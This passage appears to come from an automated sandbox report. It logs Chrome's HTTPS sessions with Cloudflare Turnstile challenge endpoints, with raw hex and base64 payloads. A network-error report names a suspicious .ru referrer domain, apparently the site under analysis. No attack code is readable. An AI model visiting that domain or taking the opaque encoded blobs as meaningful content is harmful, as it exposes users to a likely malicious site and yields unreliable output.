                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 45 4e 73 55 46 68 62 54 56 78 2b 58 54 74 54 51 56 70 4d 55 46 35 75 66 33 6c 2f 64 6b 46 6b 52 47 56 72 5a 31 75 41 65 33 36 49 64 34 4f 54 6a 32 78 31 54 70 36 64 61 59 31 7a 69 35 64 69 70 6e 31 6e 64 6e 4b 68 59 5a 68 31 65 34 4b 67 6a 48 31 78 72 49 32 74 67 36 47 47 71 49 2b 4d 76 4c 69 55 6a 37 70 35 66 61 78 2b 6b 72 31 2b 6f 49 43 57 76 49 32 6c 72 61 47 6d 73 63 4f 4d 7a 62 66 4b 6b 34 2f 43 71 4c 48 52 76 74 47 5a 7a 72 79 66 6f 5a 79 64 30 72 48 45 74 61 6a 4c 72 4c 66 63 37 61 65 6f 38 4f 4c 43 76 2b 61 75 74 72 72 70 79 37 50 47 31 76 33 52 2b 4c 72 6b 35 72 7a 65 35 4e 2f 6d 43 4f 6a 4c 35 74 76 70 35 65 33 76 35 64 37 78 34 66 6b 50 43 76 4c 57 31 4e 6e 74 39 41 34 43 49 50 66 2b 47 68 6b 6d 33 2b 63 4b 47 78 6a 6d 4a 68 49 6d 4c 6a 48 2b
                                                                  Data Ascii: ENsUFhbTVx+XTtTQVpMUF5uf3l/dkFkRGVrZ1uAe36Id4OTj2x1Tp6daY1zi5dipn1ndnKhYZh1e4KgjH1xrI2tg6GGqI+MvLiUj7p5fax+kr1+oICWvI2lraGmscOMzbfKk4/CqLHRvtGZzryfoZyd0rHEtajLrLfc7aeo8OLCv+autrrpy7PG1v3R+Lrk5rze5N/mCOjL5tvp5e3v5d7x4fkPCvLW1Nnt9A4CIPf+Ghkm3+cKGxjmJhImLjH+
                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 74 33 55 44 38 39 55 48 31 4e 65 31 69 47 64 6a 70 49 57 32 64 46 64 6d 71 47 63 48 31 78 59 32 52 79 63 34 78 72 6c 49 61 54 62 57 71 65 66 35 74 36 62 33 56 7a 58 6e 43 58 6e 57 6c 6f 72 4b 78 33 59 49 42 71 6d 71 2b 67 64 48 42 7a 6a 34 4f 69 63 59 56 37 72 33 61 36 65 61 75 61 76 71 4b 69 6d 72 2b 45 78 34 6e 4c 66 6f 32 6a 77 5a 6d 79 71 49 76 48 79 4b 4c 50 6b 62 4b 30 6d 4c 65 63 76 37 6e 56 31 65 48 56 78 4c 57 33 75 62 66 5a 71 65 44 47 70 4c 37 42 78 39 33 6e 34 38 54 4f 30 2b 7a 30 72 38 7a 6a 37 65 66 4c 38 65 6a 31 77 76 50 32 38 41 66 6f 77 39 50 47 78 74 72 71 34 67 2f 78 2b 66 7a 2b 43 4f 6f 43 41 74 51 61 2b 4e 66 31 46 68 58 74 2f 68 48 68 46 68 48 36 38 42 6e 79 42 2f 67 4d 34 77 51 72 49 53 37 73 36 69 73 66 4b 69 77 4b 4d 51 55 7a 4d
                                                                  Data Ascii: t3UD89UH1Ne1iGdjpIW2dFdmqGcH1xY2Ryc4xrlIaTbWqef5t6b3VzXnCXnWlorKx3YIBqmq+gdHBzj4OicYV7r3a6eauavqKimr+Ex4nLfo2jwZmyqIvHyKLPkbK0mLecv7nV1eHVxLW3ubfZqeDGpL7Bx93n48TO0+z0r8zj7efL8ej1wvP28Afow9PGxtrq4g/x+fz+COoCAtQa+Nf1FhXt/hHhFhH68BnyB/gM4wQrIS7s6isfKiwKMQUzM
                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 44 67 56 74 77 65 6e 47 49 69 57 56 6c 57 34 35 2f 57 57 4a 70 65 33 78 48 6a 49 6d 4f 69 47 39 38 5a 58 78 63 56 58 4e 65 59 58 4a 7a 63 33 47 6f 58 35 4f 49 70 35 39 35 67 6f 74 35 68 48 43 4b 71 6e 47 32 6f 72 43 58 69 35 6c 75 6b 4b 2b 4f 6b 37 47 63 66 33 2b 79 6b 4d 53 43 76 72 57 73 71 35 32 36 7a 63 79 72 6b 4b 61 74 73 4a 4f 50 72 61 33 56 72 4a 79 30 7a 72 37 53 79 37 6a 5a 75 2b 43 63 78 37 66 52 76 2b 72 5a 78 37 32 34 36 4c 72 54 33 73 48 67 73 4d 2f 77 78 2b 69 30 75 4c 62 54 31 2b 75 39 30 74 33 74 2f 64 58 67 78 72 73 4c 33 73 76 66 36 4f 49 41 37 4f 6e 66 79 38 37 6c 45 76 6b 54 42 66 67 61 36 4f 38 59 44 67 48 66 39 2b 34 4f 35 66 49 63 49 4f 59 55 39 78 34 4c 37 51 66 77 4c 52 30 75 43 54 44 7a 49 52 6e 35 2b 50 77 66 45 52 63 30 41 66
                                                                  Data Ascii: DgVtwenGIiWVlW45/WWJpe3xHjImOiG98ZXxcVXNeYXJzc3GoX5OIp595got5hHCKqnG2orCXi5lukK+Ok7Gcf3+ykMSCvrWsq526zcyrkKatsJOPra3VrJy0zr7Sy7jZu+Ccx7fRv+rZx7246LrT3sHgsM/wx+i0uLbT1+u90t3t/dXgxrsL3svf6OIA7Onfy87lEvkTBfga6O8YDgHf9+4O5fIcIOYU9x4L7QfwLR0uCTDzIRn5+PwfERc0Af
                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 55 30 5a 66 57 6d 68 4e 53 57 4b 44 6b 56 52 71 63 6c 64 71 63 70 57 63 65 31 56 51 57 5a 42 64 6a 36 46 37 58 4a 6d 6f 6f 56 75 6e 6e 59 4f 71 72 4a 42 2b 61 35 4e 75 6c 49 64 77 72 61 74 35 6f 35 4a 36 72 59 69 4e 6a 58 6d 64 77 4b 79 43 6b 72 69 38 78 4a 69 56 69 4b 65 33 75 70 37 45 72 4b 32 30 7a 64 57 55 7a 4d 53 79 32 70 6d 6e 76 73 75 2b 72 73 72 5a 74 4e 37 6a 32 4f 61 30 70 39 50 71 79 39 66 6a 6f 72 6e 47 73 64 54 51 7a 74 53 32 39 76 48 33 38 73 66 71 30 72 2f 4b 33 4e 62 37 39 4f 54 56 30 73 4c 6a 34 67 37 2b 2b 42 48 77 32 73 33 6a 30 51 37 4e 31 77 38 59 44 67 58 61 46 41 76 2b 47 66 62 68 37 4e 76 63 35 69 4d 67 47 75 49 58 44 68 33 74 48 42 41 7a 36 44 49 44 43 41 38 6b 4a 43 55 4d 46 6a 6b 73 2b 78 37 32 41 42 59 66 47 2f 34 78 4b 54 4d
                                                                  Data Ascii: U0ZfWmhNSWKDkVRqcldqcpWce1VQWZBdj6F7XJmooVunnYOqrJB+a5NulIdwrat5o5J6rYiNjXmdwKyCkri8xJiViKe3up7ErK20zdWUzMSy2pmnvsu+rsrZtN7j2Oa0p9Pqy9fjornGsdTQztS29vH38sfq0r/K3Nb79OTV0sLj4g7++BHw2s3j0Q7N1w8YDgXaFAv+Gfbh7Nvc5iMgGuIXDh3tHBAz6DIDCA8kJCUMFjks+x72ABYfG/4xKTM
                                                                  2025-01-13 21:37:23 UTC1369INData Raw: 49 70 6e 66 49 6c 6e 61 58 68 7a 6a 32 4e 71 56 5a 78 79 6e 33 65 63 6c 33 31 67 66 35 47 69 64 70 79 44 64 59 79 6c 72 49 47 6b 6e 49 75 69 63 58 2b 58 6a 5a 61 49 6f 72 47 4d 74 4c 75 77 76 6f 78 2f 71 38 4b 6a 73 4c 32 6c 69 5a 36 4a 72 4b 61 6d 72 49 37 4d 73 35 75 55 7a 63 47 6c 70 5a 66 49 70 64 6a 65 32 37 76 4a 6c 35 2f 42 33 74 37 68 77 75 47 6a 36 4d 61 6a 36 65 72 49 33 2b 50 4f 79 4d 4c 67 78 66 65 33 32 75 72 61 33 4c 72 76 2b 50 4c 38 39 39 58 43 33 37 6a 55 31 50 77 49 42 50 51 47 35 67 41 44 2f 42 50 6b 7a 39 2f 51 39 2b 62 32 38 50 54 39 42 67 72 66 46 50 59 4e 34 75 41 6d 41 78 58 33 39 76 73 49 46 67 41 42 35 69 50 78 4b 50 48 78 4a 68 51 53 42 66 45 70 4a 52 37 36 46 76 37 33 2f 54 55 35 45 45 55 67 50 76 6f 4b 50 6a 67 6b 43 7a 41 4e
                                                                  Data Ascii: IpnfIlnaXhzj2NqVZxyn3ecl31gf5GidpyDdYylrIGknIuicX+XjZaIorGMtLuwvox/q8KjsL2liZ6JrKamrI7Ms5uUzcGlpZfIpdje27vJl5/B3t7hwuGj6Maj6erI3+POyMLgxfe32ura3Lrv+PL899XC37jU1PwIBPQG5gAD/BPkz9/Q9+b28PT9BgrfFPYN4uAmAxX39vsIFgAB5iPxKPHxJhQSBfEpJR76Fv73/TU5EEUgPvoKPjgkCzAN


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.164974235.190.80.14437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:24 UTC476OUTPOST /report/v4?s=h26TBLVTtzPIJ9qwskmM05jz%2FRcml4h%2BqRQm9ndjxZo%2Bp9rqLiqn26xPkTWlfuMGQDwRW7aTQ5r1ZmIN9tweYD1CYz5xHFGpdQian4USZriP3YfCWz7lwKiNWlGylg%3D%3D HTTP/1.1
                                                                  Host: a.nel.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 432
                                                                  Content-Type: application/reports+json
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:24 UTC432OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 37 73 6e 2e 73 68 61 63 65 73 68 72 6f 76 2e 72 75 2f 49 67 45 45 76 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 30 34 2e 37 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72
                                                                  Data Ascii: [{"age":0,"body":{"elapsed_time":116,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://m7sn.shaceshrov.ru/IgEEv/","sampling_fraction":1.0,"server_ip":"172.67.204.74","status_code":404,"type":"http.error"},"type":"network-error
                                                                  2025-01-13 21:37:24 UTC168INHTTP/1.1 200 OK
                                                                  Content-Length: 0
                                                                  date: Mon, 13 Jan 2025 21:37:24 GMT
                                                                  Via: 1.1 google
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  24192.168.2.1649744104.18.95.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:24 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/291047480:1736802921:6cAIPi7OVuOlpkf5Flnw52f_YS5aDPw6UYjgs6Pq5ck/901886f16aa00f3b/aug6nWRD8oN0o9STjshe0NwiJi9eHu1Mo_8PWDLYFtY-1736804242-1.1.1.1-iKIFn8UsYFPDX5tWJc7Ywt.PhMZpkhR5BUHWkehojzXA67DeXJ8KQhyBWtcjEArv HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:24 UTC375INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 13 Jan 2025 21:37:24 GMT
                                                                  Content-Type: application/json
                                                                  Content-Length: 7
                                                                  Connection: close
                                                                  cf-chl-out: vwTJQft9BbzrBi43X8KkZA==$LKROQZNm7hICdZbM+1l2xw==
                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                  Server: cloudflare
                                                                  CF-RAY: 901887020c6143e6-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:37:24 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                  Data Ascii: invalid


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  25192.168.2.1649745104.18.94.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:24 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/901886f16aa00f3b/1736804243853/712d77cb7e0d781f9c3ef171a5f952730849b6ed771224728ce875a82fa85272/Rpq0TkadgkMtd8p HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Cache-Control: max-age=0
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ercd6/0x4AAAAAAA1mJe-KJqboZa9M/auto/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:25 UTC143INHTTP/1.1 401 Unauthorized
                                                                  Date: Mon, 13 Jan 2025 21:37:25 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 1
                                                                  Connection: close
                                                                  2025-01-13 21:37:25 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 63 53 31 33 79 33 34 4e 65 42 2d 63 50 76 46 78 70 66 6c 53 63 77 68 4a 74 75 31 33 45 69 52 79 6a 4f 68 31 71 43 2d 6f 55 6e 49 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                  Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gcS13y34NeB-cPvFxpflScwhJtu13EiRyjOh1qC-oUnIAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                  2025-01-13 21:37:25 UTC1INData Raw: 4a
                                                                  Data Ascii: J


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  26192.168.2.1649746104.18.94.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:25 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/901886f16aa00f3b/1736804243853/PTgPS3OFq7peaq1 HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ercd6/0x4AAAAAAA1mJe-KJqboZa9M/auto/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:25 UTC200INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:25 GMT
                                                                  Content-Type: image/png
                                                                  Content-Length: 61
                                                                  Connection: close
                                                                  Server: cloudflare
                                                                  CF-RAY: 90188707cd208ca2-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:37:25 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 59 00 00 00 08 08 02 00 00 00 1d bb c4 aa 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                  Data Ascii: PNGIHDRYIDAT$IENDB`


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  27192.168.2.1649747104.18.95.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:26 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/901886f16aa00f3b/1736804243853/PTgPS3OFq7peaq1 HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:26 UTC200INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:26 GMT
                                                                  Content-Type: image/png
                                                                  Content-Length: 61
                                                                  Connection: close
                                                                  Server: cloudflare
                                                                  CF-RAY: 9018870b9bb84390-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:37:26 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 59 00 00 00 08 08 02 00 00 00 1d bb c4 aa 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                  Data Ascii: PNGIHDRYIDAT$IENDB`


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  28192.168.2.1649748104.18.94.414437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:26 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/291047480:1736802921:6cAIPi7OVuOlpkf5Flnw52f_YS5aDPw6UYjgs6Pq5ck/901886f16aa00f3b/aug6nWRD8oN0o9STjshe0NwiJi9eHu1Mo_8PWDLYFtY-1736804242-1.1.1.1-iKIFn8UsYFPDX5tWJc7Ywt.PhMZpkhR5BUHWkehojzXA67DeXJ8KQhyBWtcjEArv HTTP/1.1
                                                                  Host: challenges.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 32100
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  Content-type: application/x-www-form-urlencoded
                                                                  CF-Chl-RetryAttempt: 0
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  CF-Challenge: aug6nWRD8oN0o9STjshe0NwiJi9eHu1Mo_8PWDLYFtY-1736804242-1.1.1.1-iKIFn8UsYFPDX5tWJc7Ywt.PhMZpkhR5BUHWkehojzXA67DeXJ8KQhyBWtcjEArv
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Origin: https://challenges.cloudflare.com
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ercd6/0x4AAAAAAA1mJe-KJqboZa9M/auto/fbE/normal/auto/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:26 UTC16384OUTData Raw: 76 5f 39 30 31 38 38 36 66 31 36 61 61 30 30 66 33 62 3d 72 4d 4c 56 6a 6e 66 37 68 34 4d 71 4d 71 65 4d 66 69 66 34 4b 33 46 37 35 78 2d 35 6e 71 72 56 56 25 32 62 67 4c 71 49 34 71 65 56 72 4a 7a 66 38 71 79 34 56 38 7a 6e 59 71 4f 56 4c 68 56 71 65 4c 71 31 56 46 78 71 4d 50 33 66 53 71 39 56 44 66 5a 71 77 7a 30 75 53 34 56 71 4f 71 6a 56 71 4d 34 4e 56 2b 36 6a 4e 63 34 57 69 48 56 2b 62 73 56 69 78 71 47 56 35 63 53 4b 59 71 79 4d 71 74 71 77 68 71 54 6b 49 42 56 56 71 35 39 71 35 4a 4c 71 6f 59 67 78 30 47 71 66 4a 77 36 42 36 49 78 50 33 71 62 49 67 4f 69 51 69 30 37 33 71 6f 78 49 67 34 4d 53 6f 77 34 71 35 2b 6b 4c 4c 69 57 4c 64 44 71 4c 67 34 78 56 6a 78 30 34 33 44 78 50 63 4f 48 37 53 63 71 31 6c 63 51 67 6d 43 6b 33 41 72 61 4b 53 59 4c 33
                                                                  Data Ascii: v_901886f16aa00f3b=rMLVjnf7h4MqMqeMfif4K3F75x-5nqrVV%2bgLqI4qeVrJzf8qy4V8znYqOVLhVqeLq1VFxqMP3fSq9VDfZqwz0uS4VqOqjVqM4NV+6jNc4WiHV+bsVixqGV5cSKYqyMqtqwhqTkIBVVq59q5JLqoYgx0GqfJw6B6IxP3qbIgOiQi073qoxIg4MSow4q5+kLLiWLdDqLg4xVjx043DxPcOH7Scq1lcQgmCk3AraKSYL3
                                                                  2025-01-13 21:37:26 UTC15716OUTData Raw: 56 66 33 66 75 71 78 71 2d 71 4c 6c 34 56 46 6e 66 64 48 59 71 6d 6f 74 69 31 56 35 4c 56 73 30 49 69 35 45 71 54 71 2b 37 66 6e 71 68 56 31 4c 71 59 71 66 4e 31 56 71 45 71 2b 56 39 68 66 4f 71 49 56 5a 68 6e 2b 71 4b 71 66 4c 71 53 71 72 56 46 7a 66 33 71 6a 56 71 6f 6c 6f 71 4f 33 34 56 66 76 71 57 56 77 71 6e 75 78 41 2d 66 37 4d 7a 71 59 56 38 68 6e 68 56 43 63 77 58 6e 30 71 6a 45 31 71 71 56 71 67 32 4c 68 6e 46 2d 4e 47 56 46 54 61 71 68 71 69 44 39 52 7a 6b 71 58 57 62 6e 71 52 46 73 36 36 6d 33 43 4f 69 57 6a 73 62 6b 71 37 39 4d 56 71 66 70 42 44 46 4a 4d 69 4e 46 33 2b 76 4d 2d 50 47 37 71 71 71 73 2b 62 35 4e 66 38 56 39 70 4e 79 33 6b 71 74 68 6e 4e 66 4c 71 38 44 69 6f 66 66 77 49 72 54 42 71 59 37 4c 68 69 7a 68 37 49 69 4c 39 52 75 4c 56
                                                                  Data Ascii: Vf3fuqxq-qLl4VFnfdHYqmoti1V5LVs0Ii5EqTq+7fnqhV1LqYqfN1VqEq+V9hfOqIVZhn+qKqfLqSqrVFzf3qjVqoloqO34VfvqWVwqnuxA-f7MzqYV8hnhVCcwXn0qjE1qqVqg2LhnF-NGVFTaqhqiD9RzkqXWbnqRFs66m3COiWjsbkq79MVqfpBDFJMiNF3+vM-PG7qqqs+b5Nf8V9pNy3kqthnNfLq8DioffwIrTBqY7Lhizh7IiL9RuLV
                                                                  2025-01-13 21:37:27 UTC322INHTTP/1.1 200 OK
                                                                  Date: Mon, 13 Jan 2025 21:37:26 GMT
                                                                  Content-Type: text/plain; charset=UTF-8
                                                                  Content-Length: 26296
                                                                  Connection: close
                                                                  cf-chl-gen: 6ftVvXgqWQyGx/ClQk/K0+KQPQgOso5EK0yLZWppXYDEjy6W74yJz0TPHGTqE0LY$LSv6Y4ezC3k/KjeIzYSVOg==
                                                                  Server: cloudflare
                                                                  CF-RAY: 9018870e897d43d5-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-13 21:37:27 UTC1047INData Raw: 62 57 56 50 68 47 43 4c 6b 5a 4b 44 61 4a 47 63 6a 4a 78 74 56 6e 65 61 6f 46 57 43 6d 49 4a 5a 68 70 78 2f 67 6f 4f 66 61 71 69 52 62 33 31 2b 6e 57 74 79 64 61 75 77 75 71 71 79 6a 36 74 2f 71 4d 43 36 72 6f 7a 44 76 33 6d 49 6b 63 69 58 6c 72 71 6b 79 61 66 4f 7a 71 61 6c 72 62 4b 72 6f 72 61 73 72 4b 7a 51 78 39 4b 34 76 63 4b 5a 75 37 76 57 76 61 53 68 31 2b 58 6c 32 4e 61 6d 33 65 54 51 78 2b 37 6e 7a 63 47 78 34 2b 2f 31 2b 4e 37 78 79 2f 48 55 31 39 47 38 74 2f 76 76 42 51 58 45 2b 73 6e 35 35 66 44 4a 42 4f 41 49 46 67 6e 55 38 78 6b 45 46 4f 4d 48 48 68 72 79 2b 52 51 41 38 76 37 7a 38 66 41 55 48 65 44 72 39 51 4d 6c 2b 43 72 38 49 50 45 69 4a 67 73 77 43 7a 6f 44 4a 77 38 37 44 7a 51 53 47 76 51 56 46 42 4d 48 41 41 49 5a 41 79 73 32 4b 44 6f
                                                                  Data Ascii: bWVPhGCLkZKDaJGcjJxtVneaoFWCmIJZhpx/goOfaqiRb31+nWtydauwuqqyj6t/qMC6rozDv3mIkciXlrqkyafOzqalrbKrorasrKzQx9K4vcKZu7vWvaSh1+Xl2Nam3eTQx+7nzcGx4+/1+N7xy/HU19G8t/vvBQXE+sn55fDJBOAIFgnU8xkEFOMHHhry+RQA8v7z8fAUHeDr9QMl+Cr8IPEiJgswCzoDJw87DzQSGvQVFBMHAAIZAys2KDo
                                                                  2025-01-13 21:37:27 UTC1369INData Raw: 32 59 6c 2b 67 6b 6f 53 6f 68 47 6c 37 71 32 61 51 69 33 75 68 72 6d 2b 47 71 49 53 6d 6b 35 65 56 6b 36 6d 50 6a 58 65 54 6e 63 4c 42 6f 35 57 37 74 62 6d 61 70 49 6d 76 75 36 53 70 30 4d 32 7a 6a 6f 7a 49 6a 73 33 52 6b 62 69 72 30 64 33 55 79 61 32 66 77 74 69 63 35 39 32 2b 79 4b 6d 39 36 71 54 49 77 38 72 44 30 75 66 47 79 38 6e 4a 39 75 58 46 74 4f 65 32 31 73 72 65 2b 66 72 79 37 64 63 49 31 75 54 34 44 51 33 6e 7a 76 76 35 30 64 7a 52 44 39 2f 75 36 75 63 59 35 42 4d 50 37 52 49 59 2f 4f 6b 62 2f 68 6f 6e 2b 78 6f 45 49 75 4d 59 2b 53 50 6c 48 69 62 6a 2b 7a 4d 73 46 43 41 54 2b 41 51 4a 4c 50 63 5a 43 53 77 4d 44 77 45 77 4d 68 6b 6c 4a 77 67 48 52 78 6f 75 4c 43 74 46 44 6b 46 4a 4e 56 59 67 51 43 6c 46 4b 44 45 6c 57 30 38 31 4d 53 6c 69 57 30
                                                                  Data Ascii: 2Yl+gkoSohGl7q2aQi3uhrm+GqISmk5eVk6mPjXeTncLBo5W7tbmapImvu6Sp0M2zjozIjs3Rkbir0d3Uya2fwtic592+yKm96qTIw8rD0ufGy8nJ9uXFtOe21sre+fry7dcI1uT4DQ3nzvv50dzRD9/u6ucY5BMP7RIY/Okb/hon+xoEIuMY+SPlHibj+zMsFCAT+AQJLPcZCSwMDwEwMhklJwgHRxouLCtFDkFJNVYgQClFKDElW081MSliW0
